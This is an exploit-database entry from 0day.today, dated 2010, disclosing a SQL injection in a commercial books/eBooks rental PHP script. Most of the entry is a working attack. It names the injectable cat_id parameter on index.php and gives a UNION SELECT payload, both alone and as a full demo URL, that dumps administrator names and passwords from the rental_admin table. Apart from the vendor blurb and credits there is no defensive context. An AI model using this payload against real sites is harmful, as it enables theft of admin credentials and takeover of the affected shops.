Books/eBooks Rental Software SQL injection Vulnerability

2010-02-11T00:00:00
ID 1337DAY-ID-10832
Type zdt
Reporter Don Tukulesto
Modified 2010-02-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================
Books/eBooks Rental Software SQL injection Vulnerability
========================================================

/**************************************************************************
 
[!] Books/eBooks Rental Software SQL injection Vulnerability
[!] Author  : Don Tukulesto 
 
**************************************************************************/
 
[ Software Information ]
 
[+] Vendor : http://www.commodityrentals.com/
[+] This script is specifically tailored for people wanting to start a Books/E-Books Rentals Business within a very short time.
    Fully E-Commerce ready, this system comes with a Books attribute template and a fully customizable "look and feel" template of the site.
[+] Method : SQL Injection
[+] Dork : Don Tukulesto
 
===========================================================================
 
[ Proof of Concept ]
 
http://server/index.php?view=gamecatalog&cat_id=[INDONESIAN CODER NOT DEAD WITHOUT YOU]
 
[ EXPL0!T ]
 
2+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0x3a,admin_password),3+from+rental_admin--
 
[ D3M0 ]
 
http://server/index.php?view=gamecatalog&cat_id=2+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0x3a,admin_password),3+from+rental_admin--
 
===========================================================================



#  0day.today [2018-04-08]  #